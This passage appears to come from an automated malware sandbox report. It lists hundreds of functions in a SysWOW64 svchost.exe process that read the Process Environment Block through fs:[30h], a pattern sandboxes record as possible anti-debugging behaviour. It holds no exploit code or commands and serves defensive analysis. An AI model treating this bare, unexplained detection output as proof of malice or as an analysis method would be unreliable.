            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov ecx, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA352 mov eax, dword ptr fs:[00000030h]1_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8350 mov ecx, dword ptr fs:[00000030h]1_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350634F mov eax, dword ptr fs:[00000030h]1_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D437C mov eax, dword ptr fs:[00000030h]1_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C310 mov ecx, dword ptr fs:[00000030h]1_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450310 mov ecx, dword ptr fs:[00000030h]1_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov ecx, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC3CD mov eax, dword ptr fs:[00000030h]1_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B63C0 mov eax, dword ptr fs:[00000030h]1_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov ecx, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034663FF mov eax, dword ptr fs:[00000030h]1_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov eax, dword ptr fs:[00000030h]1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov ecx, dword ptr fs:[00000030h]1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350625D mov eax, dword ptr fs:[00000030h]1_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A250 mov eax, dword ptr fs:[00000030h]1_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436259 mov eax, dword ptr fs:[00000030h]1_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342826B mov eax, dword ptr fs:[00000030h]1_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342823B mov eax, dword ptr fs:[00000030h]1_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035062D6 mov eax, dword ptr fs:[00000030h]1_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov ecx, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov ecx, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C156 mov eax, dword ptr fs:[00000030h]1_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C8158 mov eax, dword ptr fs:[00000030h]1_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov ecx, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F0115 mov eax, dword ptr fs:[00000030h]1_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460124 mov eax, dword ptr fs:[00000030h]1_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035061E5 mov eax, dword ptr fs:[00000030h]1_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034601F8 mov eax, dword ptr fs:[00000030h]1_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03470185 mov eax, dword ptr fs:[00000030h]1_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432050 mov eax, dword ptr fs:[00000030h]1_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6050 mov eax, dword ptr fs:[00000030h]1_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C073 mov eax, dword ptr fs:[00000030h]1_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4000 mov ecx, dword ptr fs:[00000030h]1_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A020 mov eax, dword ptr fs:[00000030h]1_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C020 mov eax, dword ptr fs:[00000030h]1_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6030 mov eax, dword ptr fs:[00000030h]1_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B20DE mov eax, dword ptr fs:[00000030h]1_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034380E9 mov eax, dword ptr fs:[00000030h]1_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60E0 mov eax, dword ptr fs:[00000030h]1_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C0F0 mov eax, dword ptr fs:[00000030h]1_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034720F0 mov ecx, dword ptr fs:[00000030h]1_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343208A mov eax, dword ptr fs:[00000030h]1_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034280A0 mov eax, dword ptr fs:[00000030h]1_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C80A8 mov eax, dword ptr fs:[00000030h]1_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov eax, dword ptr fs:[00000030h]1_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov ecx, dword ptr fs:[00000030h]1_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov esi, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430750 mov eax, dword ptr fs:[00000030h]1_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE75D mov eax, dword ptr fs:[00000030h]1_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4755 mov eax, dword ptr fs:[00000030h]1_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438770 mov eax, dword ptr fs:[00000030h]1_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C700 mov eax, dword ptr fs:[00000030h]1_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430710 mov eax, dword ptr fs:[00000030h]1_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460710 mov eax, dword ptr fs:[00000030h]1_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov ecx, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC730 mov eax, dword ptr fs:[00000030h]1_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C0 mov eax, dword ptr fs:[00000030h]1_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B07C3 mov eax, dword ptr fs:[00000030h]1_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE7E1 mov eax, dword ptr fs:[00000030h]1_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D678E mov eax, dword ptr fs:[00000030h]1_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034307AF mov eax, dword ptr fs:[00000030h]1_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E47A0 mov eax, dword ptr fs:[00000030h]1_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344C640 mov eax, dword ptr fs:[00000030h]1_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462674 mov eax, dword ptr fs:[00000030h]1_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE609 mov eax, dword ptr fs:[00000030h]1_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
